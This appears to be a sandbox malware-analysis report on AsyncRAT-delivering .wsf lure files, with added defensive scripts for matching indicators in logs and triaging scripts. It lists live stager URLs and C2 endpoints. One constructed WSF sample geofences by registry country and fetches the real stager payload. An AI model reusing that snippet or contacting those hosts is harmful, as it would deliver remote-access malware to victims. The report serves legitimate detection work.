Overview

Score: 10/10

Analysis tasks (platform in parentheses):
Static
2O22-Tax-Returns.wsf (windows7-x64)
2O22-Tax-Returns.wsf (windows10-2004-x64)
DRlVERS-LlCENSE.wsf (windows7-x64)
DRlVERS-LlCENSE.wsf (windows10-2004-x64)
PR0FlT&L0SS_2O23.wsf (windows7-x64)
PR0FlT&L0SS_2O23.wsf (windows10-2004-x64)
ScheduIe-K.wsf (windows7-x64)
ScheduIe-K.wsf (windows10-2004-x64)

Note that the four lure filenames swap look-alike characters for the expected ones (letter O for the digit 0 in 2O22 and 2O23, digit 0 for O in PR0FlT and L0SS, lowercase l for I in DRlVERS, LlCENSE and PR0FlT, capital I for l in ScheduIe), so an exact-match filename blocklist built from the plain spellings would not catch them.

General
Target: efc039447276a5cbec3a462f957db357.bin
Size: 12KB
Sample: 240124-eyr78aadep
MD5: efc039447276a5cbec3a462f957db357
SHA1: 9cc91327363b0e1817acd480b48c0b41351ee87b
SHA256: a0de57ddd8f03531fe83fa680a519d69616e04919cb0b30b2a1eac69124d6131
SHA512: 7ef82df5d5afa8b97aebb2ddadc1b2714929f1886c8cedb109930a440cb04d009a0e2223f7b492e599262651e75c64d3840a4de31ebdefa0874c14b27df7cc4b
SSDEEP: 192:d39TSvyA1butJdIzlogSG0IfymidyaXWOLG3Zhxs+M/8n29NYmJyGGWFGGGrG7eH:+vy/dGKIKcatCDW+I9emJJSl
Tasks

static1: Static task
behavioral1: 2O22-Tax-Returns.wsf on win7-20231215-en
behavioral2: 2O22-Tax-Returns.wsf on win10v2004-20231215-en
behavioral3: DRlVERS-LlCENSE.wsf on win7-20231215-en
behavioral4: DRlVERS-LlCENSE.wsf on win10v2004-20231215-en
behavioral5: PR0FlT&L0SS_2O23.wsf on win7-20231215-en
behavioral6: PR0FlT&L0SS_2O23.wsf on win10v2004-20231215-en
behavioral7: ScheduIe-K.wsf on win7-20231129-en
Malware Config

Extracted (download URLs):
http://176.107.185.29:666/Rar.jpg
http://176.107.185.29:666/load.rar

Extracted (asyncrat):
Identifier strings as extracted (unlabelled in the report): AWS | 3Losh, BB
C2: icant.theworkpc.com:6606, icant.theworkpc.com:7707, icant.theworkpc.com:8808, icant.theworkpc.com:5550
Mutex: AsyncMutex_alosh
delay: 3
install: false
install_folder: %AppData%
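The indicators above are the ones a responder would want to sweep for first: the two stager URLs on 176.107.185.29:666 and the four AsyncRAT C2 ports on icant.theworkpc.com. The script below is an added example, not code from the report or from the sample: it turns those values into URL-, host- and endpoint-level indicators and matches them against network log lines. The two log line shapes ("proxy" and "conn") and the sample log are constructed for the example; only the indicator values come from the report.

```python
"""Build an indicator set from the values extracted in the Malware Config
section and match them against network log lines.

The URLs, C2 host and ports are the report's own values; the log format
and the sample log lines are constructed for this example."""
import re
from urllib.parse import urlparse

DOWNLOAD_URLS = [
    "http://176.107.185.29:666/Rar.jpg",
    "http://176.107.185.29:666/load.rar",
]
C2_HOST = "icant.theworkpc.com"
C2_PORTS = {6606, 7707, 8808, 5550}


def build_indicators(urls=DOWNLOAD_URLS, c2_host=C2_HOST, c2_ports=C2_PORTS):
    """Derive host-, endpoint- and URL-level indicators from the config."""
    ind = {"urls": set(urls), "hosts": {c2_host}, "endpoints": set()}
    for u in urls:
        p = urlparse(u)
        # The stager IP is worth matching on its own, not only as a full URL.
        ind["hosts"].add(p.hostname)
        ind["endpoints"].add((p.hostname, p.port or 80))
    for port in c2_ports:
        ind["endpoints"].add((c2_host, port))
    return ind


# Constructed line shapes (assumption, not a real log format):
#   <ts> proxy <client> <method> <url>
#   <ts> conn  <client> <dst_host_or_ip>:<port>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>proxy|conn)\s+(?P<src>\S+)\s+(?P<rest>.+)$")


def match_line(line, ind):
    """Return (src, indicator_type, value) for a matching line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    src, kind, rest = m.group("src"), m.group("kind"), m.group("rest")
    if kind == "proxy":
        _method, url = rest.split(None, 1)
        if url in ind["urls"]:
            return (src, "download_url", url)
        host = urlparse(url).hostname
        if host in ind["hosts"]:
            return (src, "c2_host", host)
        return None
    host, _, port = rest.rpartition(":")
    if port.isdigit() and (host, int(port)) in ind["endpoints"]:
        return (src, "c2_endpoint", f"{host}:{port}")
    if host in ind["hosts"]:
        # Known host on an unlisted port: still worth a look, lower confidence.
        return (src, "c2_host", host)
    return None


def scan(lines, ind=None):
    """Scan an iterable of log lines; return the hits in log order."""
    ind = ind or build_indicators()
    return [hit for hit in (match_line(ln, ind) for ln in lines) if hit]


# Constructed sample log (not taken from the report).
SAMPLE_LOG = """\
2024-01-24T06:51:02Z proxy 10.0.0.15 GET http://176.107.185.29:666/Rar.jpg
2024-01-24T06:51:09Z proxy 10.0.0.15 GET http://176.107.185.29:666/load.rar
2024-01-24T06:52:40Z conn 10.0.0.15 icant.theworkpc.com:6606
2024-01-24T06:53:00Z conn 10.0.0.22 icant.theworkpc.com:443
2024-01-24T06:55:12Z proxy 10.0.0.30 GET http://example.com/index.html
"""

if __name__ == "__main__":
    for src, kind, value in scan(SAMPLE_LOG.splitlines()):
        print(f"{src}\t{kind}\t{value}")
```

The host-only match on the last "conn" line is deliberate: the report lists four C2 ports, but an operator can rotate ports without changing the domain, so a hit on the domain alone is still worth triaging, just at lower confidence than an exact endpoint or URL match.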
Targets

Target: 2O22-Tax-Returns.wsf
Size: 22KB
MD5: 98ee1c0d924160400ecef6a607233e71
SHA1: bf458f68d2080dfc3b3ab557c422e003f83a80e8
SHA256: 31474cb3c6ed64770b4930d9d0ba11edc9ba03b7c09d9a3798eb8b77a81ca50a
SHA512: 81e77e30dcd15edf8089eb4299c4e01914a889b90eb46ba99c90087e043832e0a6caaf7fcebd51905e31f14cdab5c042bb43de9d35078c92155197a84e370be7
SSDEEP: 384:eE3AcRO1fDgpRyeBNhQz0yFvYN5E3AcRO1fDgpRyeBNhQz0yFvYN/:x3bObgDyeHk0yFvYY3bObgDyeHk0yFvg
Signatures:
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings (looks up country code configured in the registry, likely geofence)
Suspicious use of SetThreadContext
Target: DRlVERS-LlCENSE.wsf
Size: 4KB
MD5: caa57de08040c5a7467546b863c6dade
SHA1: 94f12d37d102aece7d32c66256bbe40efb6c1a3b
SHA256: d4f23048f4310ff503350d6d936be6ceaff825ba74cedeb52a783441aca627b7
SHA512: 123bc8e1dc3166a07692cf8f1b428cf4366daaceea60438952151cf7ea27493bb302e8f59403172857a1078c66d656d571b591d4541968958a0723626a40c957
SSDEEP: 96:pZ9YdUGcYNSoccNLevSNbZ9YdUGcYNSoccNLevSNm:pZ9YGGcYNSoGvSpZ9YGGcYNSoGvSE
Signatures:
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings (looks up country code configured in the registry, likely geofence)
Suspicious use of SetThreadContext
Target: PR0FlT&L0SS_2O23.wsf
Size: 31KB
MD5: 20874f5aa9f33c23c82862559cba74f6
SHA1: bf1b13349c19b8bf9350441292adffe9846d5723
SHA256: edc2eeccd548103567716d8f84ffad3389e061c1a0787d38d854dbf616485ebe
SHA512: e553b7defd08b73ef5760b68fb47bafd2ee38763c8806b526421ff3fab70ed8240f94dae3f5c60484d779e43a6097be4714d057ba3c5c0dc2cd475ffd5b9eaed
SSDEEP: 768:x15HSHJkDKQvY5wcx3OxhJz42O4zcHJN67+15HSHJkDKQvY5wcx3OxhJz42O4zce:xRit2wq+Rit2wq1
Signatures:
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings (looks up country code configured in the registry, likely geofence)
Suspicious use of SetThreadContext
Target: ScheduIe-K.wsf
Size: 4KB
MD5: eafa5d2bdb1f8bca65b208d7e6101e1c
SHA1: da7085b340e3b02d94bb4acc92ee9475133b7948
SHA256: 572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0
SHA512: 2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8
SSDEEP: 96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB
Signatures:
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings (looks up country code configured in the registry, likely geofence)
Suspicious use of SetThreadContext
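Two of the signatures above describe behaviour that can be spotted in a .wsf file before it is ever detonated: the registry lookup of the configured country behind "Checks computer location settings", and the remote fetch behind "Blocklisted process makes network request" / "Downloads MZ/PE file". The script below is an added example, not the report's or the sample's code: a static triage pass that pulls RegRead targets, URL literals and COM object names out of a WSF. The registry path it treats as the country lookup (HKCU\Control Panel\International\Geo\Nation) and the COM object list are assumptions about how such scripts are usually written, and the sample WSF is constructed for the example; the only value taken from the report is the stager URL.

```python
"""Static triage of a .wsf script for a country (GeoID) registry read and
a remote payload fetch.

The registry path, the COM object names and SAMPLE_WSF are assumptions made
for this example; nothing here is the page's or the sample's own code."""
import re

# Registry location Windows uses for the configured country (GeoID); a script
# reading it is the behaviour the "checks computer location settings"
# signature describes (assumption about the signature's trigger).
GEO_KEY_FRAGMENT = r"control panel\international"

# COM objects scripts commonly use to fetch and write a remote file.
DOWNLOAD_OBJECTS = (
    "MSXML2.XMLHTTP",
    "MSXML2.ServerXMLHTTP",
    "WinHttp.WinHttpRequest",
    "ADODB.Stream",
)

REGREAD_RE = re.compile(r'RegRead\s*\(\s*"([^"]+)"', re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)
ACTIVEX_RE = re.compile(
    r"""(?:ActiveXObject|CreateObject)\s*\(\s*["']([^"']+)["']""", re.IGNORECASE)


def _normalise_key(key):
    # JScript source doubles backslashes inside string literals; VBScript does
    # not. Collapse both forms to a plain registry path.
    return key.replace("\\\\", "\\")


def triage(text):
    """Return the registry reads, URLs and COM objects found in a WSF body."""
    reads = [_normalise_key(k) for k in REGREAD_RE.findall(text)]
    objects = ACTIVEX_RE.findall(text)
    wanted = {d.lower() for d in DOWNLOAD_OBJECTS}
    return {
        "registry_reads": reads,
        "geofence": any(GEO_KEY_FRAGMENT in k.lower() for k in reads),
        "urls": URL_RE.findall(text),
        "download_objects": [o for o in objects if o.lower() in wanted],
    }


# Constructed sample WSF (not the analysed file): JScript that reads the GeoID,
# branches on it and fetches the stager URL from the report. "NNN" is a
# placeholder; the real comparison value is not known from the report.
SAMPLE_WSF = r'''<job id="main">
<script language="JScript">
var sh = new ActiveXObject("WScript.Shell");
var nation = sh.RegRead("HKCU\\Control Panel\\International\\Geo\\Nation");
if (nation != "NNN") {
  var req = new ActiveXObject("MSXML2.XMLHTTP");
  req.open("GET", "http://176.107.185.29:666/Rar.jpg", false);
  req.send();
}
</script>
</job>'''

if __name__ == "__main__":
    result = triage(SAMPLE_WSF)
    for key, value in result.items():
        print(f"{key}: {value}")
```

A geofence hit plus a download object plus a URL literal in a 4KB-30KB script is the combination the four targets above share, and it is cheap to score on a mail gateway or a file share scan without running anything. The pass is deliberately literal: it will miss strings assembled at runtime, which is why the sandbox's behavioural signature still matters.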